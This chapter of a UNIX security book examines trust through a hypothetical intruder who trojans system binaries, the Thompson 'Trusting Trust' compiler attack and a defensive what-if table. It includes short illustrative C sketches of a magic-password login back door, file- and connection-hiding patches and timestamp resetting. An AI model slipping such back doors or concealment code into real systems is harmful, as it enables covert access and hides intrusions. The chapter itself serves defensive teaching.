Practical UNIX & Internet Security


27. Who Do You Trust?

Contents:
Can You Trust Your Computer?
Can You Trust Your Suppliers?
Can You Trust People?
What All This Means

Trust is the most important quality in computer security. If you build a bridge, you can look at the bridge every morning and make sure it's still standing. If you paint a house, you can sample the soil and analyze it at a laboratory to ensure that the paint isn't causing toxic runoff. But in the field of computer security, most of the tools that you have for determining the strength of your defenses and for detecting break-ins reside on your computer itself. Those tools are as mutable as the rest of your computer system.

When your computer tells you that nobody has broken through your defenses, how do you know that you can trust what it is saying?

27.1 Can You Trust Your Computer?

For a few minutes, try thinking like a computer criminal. A few months ago you were fired from Big Whammix, the large smokestack employer on the other side of town, and now you're working for a competing company, Bigger Bammers. Your job at Bammers is corporate espionage; you've spent the last month trying to break into Big Whammix's central mail server. Yesterday, you discovered a bug in a version of sendmail [1] that Whammix is running, and you gained superuser access.

[1] This is a safe enough bet - sendmail seems to have an endless supply of bugs and design misfeatures leading to security problems.

What do you do now?

Your primary goal is to gain as much valuable corporate information as possible, and to do so without leaving any evidence that would allow you to be caught. But you have a secondary goal of masking your steps, so that your former employers at Whammix will never figure out that they have lost information.

Realizing that the hole in the Whammix sendmail daemon might someday be plugged, you decide to create a new back door that you can use to gain access to the company's computers in the future. The easiest thing to do is to modify the computer's /bin/login program to accept hidden passwords. Therefore, you take your own copy of the source code to login.c and modify it to allow anybody to log in as root if they type a particular sequence of apparently random passwords. Then you compile the modified program and install it as /bin/login.
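
Such a back door can be startlingly small. The fragment below is purely illustrative - the magic password, the function name, and the single-password check are all invented for this sketch (the scenario above uses a sequence of passwords) - but it shows how few lines an attacker needs to add to the password check while leaving normal authentication untouched:

    /* Hypothetical back-door fragment, for illustration only.
       A real login.c is far larger; the point is how little
       code the attacker has to add. */
    #include <string.h>
    #include <unistd.h>   /* crypt() is declared in <crypt.h> on some systems */

    #define MAGIC_PASSWORD "k3!zQv8#"   /* the attacker's hidden password */

    /* Returns nonzero if the login attempt should succeed. */
    int check_password(const char *typed, const char *encrypted)
    {
        /* The back door: the magic string works for any account. */
        if (strcmp(typed, MAGIC_PASSWORD) == 0)
            return 1;

        /* The normal path, unchanged. */
        return strcmp(crypt(typed, encrypted), encrypted) == 0;
    }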

You want to hide evidence of your data collection, so you also patch the /bin/ls program: when it is asked to list the contents of the directory in which you are storing your cracker tools and intercepted mail, it displays none of your files. You "fix" these patched programs so that the checksums reported by /usr/bin/sum match those of the originals. Then you manipulate the system clock, or edit the raw disk, to set the times in the inodes back to their original values, further cloaking your modifications.
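
Neither change requires deep wizardry. The sketch below is hypothetical (the filename prefix is invented for the example): it shows an ls-style listing loop that silently skips the attacker's files, and a call to utimes() that puts a file's access and modification times back the way they were. Note that utimes() cannot reset the inode change time (ctime), which is exactly why the scenario resorts to setting the system clock back or editing the raw disk.

    /* Illustrative sketches of the two tricks described above. */
    #include <stdio.h>
    #include <string.h>
    #include <dirent.h>
    #include <sys/time.h>

    #define STASH_PREFIX ".mail.tmp"   /* invented name for the hidden files */

    /* A patched ls would list everything except the attacker's stash. */
    void list_directory(const char *path)
    {
        DIR *dir = opendir(path);
        struct dirent *dp;

        if (dir == NULL)
            return;
        while ((dp = readdir(dir)) != NULL) {
            if (strncmp(dp->d_name, STASH_PREFIX, strlen(STASH_PREFIX)) == 0)
                continue;               /* hide the stash */
            printf("%s\n", dp->d_name);
        }
        closedir(dir);
    }

    /* After trojaning a binary, restore the access and modification
       times that were recorded before the change was made. */
    int restore_times(const char *path, const struct timeval saved[2])
    {
        return utimes(path, saved);
    }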

You'll be connecting to the computer on a regular basis, so you also modify /usr/bin/netstat so that it doesn't display connections between the Big Whammix IP subnet and the subnet at Bigger Bammers. You may also modify the /usr/bin/ps and /usr/bin/who programs, so that they don't list users who are logged in via this special back door.
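
The netstat change follows the same pattern: a single test buried in the display loop. In this hypothetical fragment the Bigger Bammers address block is invented for the example; a patched netstat would call the test for each connection and silently skip any that match:

    #include <arpa/inet.h>
    #include <netinet/in.h>

    /* Invented address block for Bigger Bammers: 192.168.47.0/24. */
    #define BAMMERS_NET   0xC0A82F00UL
    #define BAMMERS_MASK  0xFFFFFF00UL

    /* Returns nonzero if this connection should be left off the display. */
    int hide_connection(struct in_addr peer)
    {
        return (ntohl(peer.s_addr) & BAMMERS_MASK) == BAMMERS_NET;
    }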

Content, you now spend the next five months periodically logging into the mail server at Big Whammix and making copies of all of the email directed to the marketing staff. You do so right up to the day that you leave your job at Bigger Bammers and move on to a new position at another firm. On your last day, you run a shell script, prepared well in advance, that restores all of the programs on the hard disk to their original configuration. Then, as a parting gesture, your script introduces subtle modifications into the Big Whammix main accounting database.

Technological fiction? Hardly. By the middle of the 1990s, attacks in which the system binaries were modified to prevent detection of the intruder had become commonplace. After sophisticated attackers gain superuser access, often the only way that you discover their presence is if they make a mistake.

27.1.1 Harry's Compiler

In the early days of the MIT Media Lab, there was a graduate student who was very unpopular with the other students in his lab. To protect his privacy, we'll call the unpopular student "Harry."

Harry was obnoxious and abrasive, and he wasn't a very good programmer either. So the other students in the lab decided to play a trick on him. They modified the PL/1 compiler on the computer that they all shared so that the program would determine the name of the person who was running it. If the person running the compiler was Harry, the program would run as usual, reporting syntax errors and the like, but it would occasionally, randomly, not produce a final output file.

This mischievous prank caused a myriad of troubles for Harry. He would make a minor change to his program, run it, and - occasionally - the program would run the same way as it did before he made his modification. He would fix bugs, but the bugs would still remain. But then, whenever he went for help, one of the other students in the lab would sit down at the terminal, log in, and everything would work properly.

Poor Harry. It was a cruel trick. Somehow, though, everybody forgot to tell him about it. He soon grew frustrated with the whole enterprise, and eventually left school.

And you thought those random "bugs" in your system were there by accident?

27.1.2 Trusting Trust

Perhaps the definitive account of the problems inherent in computer security and trust is related in Ken Thompson's article, "Reflections on Trusting Trust." [2] Thompson describes a back door planted in an early research version of UNIX.

[2] Communications of the ACM, Volume 27, Number 8, August 1984.

The back door was a modification to the /bin/login program that would allow him to gain superuser access to the system at any time, even if his account had been deleted, by providing a predetermined username and password. While such a modification is easy to make, it's also an easy one to detect by looking at the computer's source code. So Thompson modified the computer's C compiler to detect if it was compiling the login.c program. If so, then the additional code for the back door would automatically be inserted into the object-code stream, even though the code was not present in the original C source file.

Thompson could now have the login.c program inspected by his coworkers, compile the program, install the /bin/login executable, and yet be assured that the back door was firmly in place.

But what if somebody inspected the source code for the C compiler itself? Thompson thought of that case as well. He further modified the C compiler so that it would detect whether it was compiling its own source code. If so, the compiler would automatically insert the recognition code itself - both the test for login.c and the test for the compiler - into the resulting binary. After one more round of compilation, Thompson could put all of the original source code back in place: the back door now lived only in the compiler binary, which faithfully reproduced it every time the compiler or login was rebuilt.
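
In outline, the whole trick needs only two pattern matches inside the compiler. The sketch below is a heavily simplified paraphrase of the scheme Thompson describes, not his actual code; match() and the emitted "object code" are stubs invented so that the sketch compiles:

    #include <stdio.h>
    #include <string.h>

    /* Stand-in for the compiler's real pattern-matching logic. */
    static int match(const char *source, const char *pattern)
    {
        return strstr(source, pattern) != NULL;
    }

    /* Stand-in for code generation. */
    static void emit(const char *what)
    {
        printf("emit: %s\n", what);
    }

    void compile(const char *source)
    {
        /* Stage 1: recognize login.c and add the back door to its
           object code; the source file itself is never touched. */
        if (match(source, "marker unique to login.c"))
            emit("back door in /bin/login");

        /* Stage 2: recognize the compiler's own source and insert
           both of these tests, so the trick survives recompilation
           from perfectly clean sources. */
        if (match(source, "marker unique to the compiler"))
            emit("both recognition tests");

        emit("normal object code for the rest of the program");
    }

    int main(void)
    {
        compile("/* pretend source containing marker unique to login.c */");
        return 0;
    }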

Thompson's experiment was like a magic trick. There was no back door in the login.c source file and no back door in the source code for the C compiler, and yet there was a back door in both the final compiler and in the login program. Abracadabra!

What hidden actions do your compiler and login programs perform?

27.1.3 What the Superuser Can and Cannot Do

As all of these examples illustrate, technical expertise combined with superuser privileges on a computer is a powerful combination. Together, they let an attacker change the very nature of the computer's operating system. An attacker can modify the system to create "hidden" directories that don't show up under normal circumstances (if at all). Attackers can change the system clock, making it look as if the files that they modify today were actually modified months ago. An attacker can forge electronic mail. (Actually, anybody can forge electronic mail, but an attacker can do a better job of it.)

Of course, there are some things that an attacker cannot do, even if that attacker is a technical genius with full access to your computer and its source code. An attacker cannot, for example, decrypt a message that has been encrypted with a perfect encryption algorithm - but he can alter the code to record the key the next time you type it. An attacker probably can't program your computer to perform mathematical calculations a dozen times faster than it currently does - although even if he could, that change would have few security implications. Most attackers can't read the contents of a file after it's been overwritten by another file, unless they take apart your computer and bring the hard disk to a laboratory. However, an attacker with privileges can alter your system so that files you have deleted are still accessible (to him).

In each case, how do you tell if the attack has occurred?

The "what-if" scenario can be taken to considerable lengths. Consider an attacker who is attempting to hide a modification in a computer's /bin/login program:

Table 27.1: The "What-If" Scenario

Attack: The attacker plants a back door in the /bin/login program to allow unauthorized access.

Response: You use PGP to create a digital signature of all system programs. You check the signatures every day.

Attack: The attacker modifies the version of PGP that you are using, so that it will report that the signature on /bin/login verifies even if it doesn't.

Response: You copy /bin/login onto another computer before verifying it with a trusted copy of PGP.

Attack: The attacker modifies your computer's kernel by adding loadable modules, so that when /bin/login is sent through a TCP connection, the original /bin/login, rather than the modified version, is sent.

Response: You put a copy of PGP on a removable hard disk. You mount the disk to perform the signature verification and then unmount it. Furthermore, you put a known-good copy of /bin/login onto the removable disk and copy it over the installed version on a regular basis.

Attack: The attacker regains control of your system and further modifies the kernel so that the modification to /bin/login is patched into the running program after it loads. Any attempt to read the contents of the /bin/login file returns the original, unmodified version.

Response: You reinstall the entire system software and configure the system to boot from a read-only device such as a CD-ROM.

Attack: Because the system now boots from a CD-ROM, you cannot easily update system software as bugs are discovered. The attacker waits for a bug to crop up in one of your installed programs, such as sendmail, ready to pounce when it is reported.

Response: Your move . . .
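
Every row of that exchange turns on the same idea: the checking tool and its reference data must live somewhere the attacker cannot touch. As a toy illustration only - FNV-1a is not a cryptographic hash, and this is no substitute for PGP signatures - a fingerprinting program like the one below could be kept on read-only media, together with its known-good output, and run against files such as /bin/login:

    /* Toy integrity checker: print a 64-bit FNV-1a fingerprint of
       each file named on the command line.  Illustration only; a
       real check needs a cryptographic hash and digital signatures. */
    #include <stdio.h>

    int main(int argc, char *argv[])
    {
        int i, c;

        for (i = 1; i < argc; i++) {
            FILE *fp = fopen(argv[i], "rb");
            unsigned long long hash = 14695981039346656037ULL;

            if (fp == NULL) {
                perror(argv[i]);
                continue;
            }
            while ((c = getc(fp)) != EOF) {
                hash ^= (unsigned long long)c;
                hash *= 1099511628211ULL;   /* the FNV-1a prime */
            }
            fclose(fp);
            printf("%016llx  %s\n", hash, argv[i]);
        }
        return 0;
    }

Even then, as the last rows of the table show, a kernel that lies about a file's contents defeats any check run on the compromised system itself.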

If you think that this description sounds like a game of chess, you're correct. Practical computer security is a series of actions and counteractions, of attacks and defenses. As with chess, success depends upon anticipating your opponent's moves and planning countermeasures ahead of time. Simply reacting to your opponent's moves is a recipe for failure.

The key thing to note, however, is that somewhere, at some level, you need to trust what you are working with. Maybe you trust the hardware. Maybe you trust the CD-ROM. But at some level, you need to trust what you have on hand. Perfect security isn't possible, so we need to settle for the next best thing - reasonable trust on which to build.

The question is, where do you place that trust?

